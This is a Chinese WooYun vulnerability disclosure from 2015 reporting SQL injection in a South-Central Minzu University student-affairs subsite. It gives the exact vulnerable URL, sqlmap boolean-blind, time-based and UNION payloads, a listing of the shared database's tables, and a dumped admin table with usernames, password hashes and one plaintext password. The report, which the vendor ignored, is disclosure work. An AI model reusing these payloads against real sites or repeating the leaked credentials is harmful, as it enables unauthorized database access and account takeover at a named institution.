当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125477

漏洞标题:中南民族大学某站数据库注入(泄露该服务器上其他多个网站数据)

相关厂商:中南民族大学

漏洞作者: Zephyrus

提交时间:2015-07-11 20:06

修复时间:2015-07-16 20:08

公开时间:2015-07-16 20:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-11: 细节已通知厂商并且等待厂商处理中
2015-07-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

闲来无聊,看了下这所学校咋样,然后在浏览某分站时发现了漏洞,职业病,浏览每个网站都想检测下...
注:专门搜过了,这个站点的漏洞还没有被提交过,主域名可能和以前的某几个漏洞一样( WooYun-2014-79140、WooYun-2015-101434),但是漏洞以及数据库都不同>_<

详细说明:

存在漏洞的站点:

http://www1.scuec.edu.cn/stu/xyh2010/view.php?id=71


id参数注入:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=71 AND 3911=3911
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=71 AND (SELECT * FROM (SELECT(SLEEP(5)))CMkP)
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=-4072 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786b6
b71,0x5566576b574852766b49,0x716b717171),NULL,NULL,NULL,NULL,NULL,NULL--
---
[19:25:13] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.12


数据库:

available databases [2]:
[*] information_schema
[*] stu


经过检测,stu数据库存在333张表,这里就不列举完了:

+----------------------------+
| admin                      |
| any_admin                  |
| any_attachment             |
| any_categories             |
| any_comments               |
| any_essay                  |
| any_info                   |
| any_live                   |
| any_log                    |
| any_role                   |
| any_user                   |
| article                    |
| article_replys             |
| biaobing_admin             |
| biaobing_message           |
| biaobing_news              |
| biaobing_stu               |
| c2c_admin                  |
| c2c_ask                    |
| c2c_content                |
| c2c_kind                   |
| c2c_liuyan                 |
| c2c_love                   |
| c2c_notice                 |
| c2c_user                   |
| dede_addonarticle          |
| dede_addonimages           |
| dede_addoninfos            |
| dede_addonshop             |
| dede_addonsoft             |
| dede_addonspec             |
| dede_admin                 |
| dede_admintype             |
| dede_advancedsearch        |
...
| yxbj_admin                 |
| yxbj_ads                   |
| yxbj_ads_place             |
| yxbj_announce              |
| yxbj_attachment            |
| yxbj_author                |
| yxbj_banip                 |
| yxbj_category              |
| yxbj_channel               |
| yxbj_city                  |
| yxbj_comment               |
| yxbj_copyfrom              |
| yxbj_field                 |
| yxbj_guestbook             |
| yxbj_keylink               |
| yxbj_keywords              |
| yxbj_log                   |
| yxbj_member                |
| yxbj_member_group          |
| yxbj_member_info           |
| yxbj_menu                  |
| yxbj_module                |
| yxbj_mytag                 |
| yxbj_position              |
| yxbj_province              |
| yxbj_reword                |
| yxbj_special               |
| yxbj_type                  |
| zuec_sort                  |
| zuec_user                  |
+----------------------------+


然后重点来了,看表前缀很有规律啊,应该是开发人员比较懒,都用同一个数据库,这就不蛤蛤了

abc.jpg


然后google hacking了下:
stu数据库存有的数据涉及以下网站:

中南民族大学学生资助网 http://www1.scuec.edu.cn/stu/xszz/
中南民族大学大学学生标兵专题网http://www1.scuec.edu.cn/stu/biaobing/
中南大学学工部 http://www1.scuec.edu.cn/stu/affairs/
〒_〒应该都是中南大学学工在线的子网站,好吧,不列举完了


本站点用户数据:

Database: stu
Table: admin
[4 entries]
+----+-----------+----------------------------------+
| id | user_name | user_pwd                         |
+----+-----------+----------------------------------+
| 1  | mixmore   | 577559799b00356fb2bd186f5ca3e156 |
| 0  | mixmore   | 577559799b00356fb2bd186f5ca3e156 |
| 2  | mixmore   | 577559799b00356fb2bd186f5ca3e156 |
| 3  | mix       | mix                              |
+----+-----------+----------------------------------+


然后就不深入了...>_<

漏洞证明:

存在漏洞的站点:

http://www1.scuec.edu.cn/stu/xyh2010/view.php?id=71


id参数注入:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=71 AND 3911=3911
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=71 AND (SELECT * FROM (SELECT(SLEEP(5)))CMkP)
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=-4072 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786b6
b71,0x5566576b574852766b49,0x716b717171),NULL,NULL,NULL,NULL,NULL,NULL--
---
[19:25:13] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.12


数据库:

available databases [2]:
[*] information_schema
[*] stu


stu库中有333张表,涉及多个子网站
其中一个用户表:

Database: stu
Table: admin
[4 entries]
+----+-----------+----------------------------------+
| id | user_name | user_pwd                         |
+----+-----------+----------------------------------+
| 1  | mixmore   | 577559799b00356fb2bd186f5ca3e156 |
| 0  | mixmore   | 577559799b00356fb2bd186f5ca3e156 |
| 2  | mixmore   | 577559799b00356fb2bd186f5ca3e156 |
| 3  | mix       | mix                              |
+----+-----------+----------------------------------+

修复方案:

不同网站数据库还是分开吧

版权声明:转载请注明来源 Zephyrus@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-16 20:08

厂商回复:

最新状态:

暂无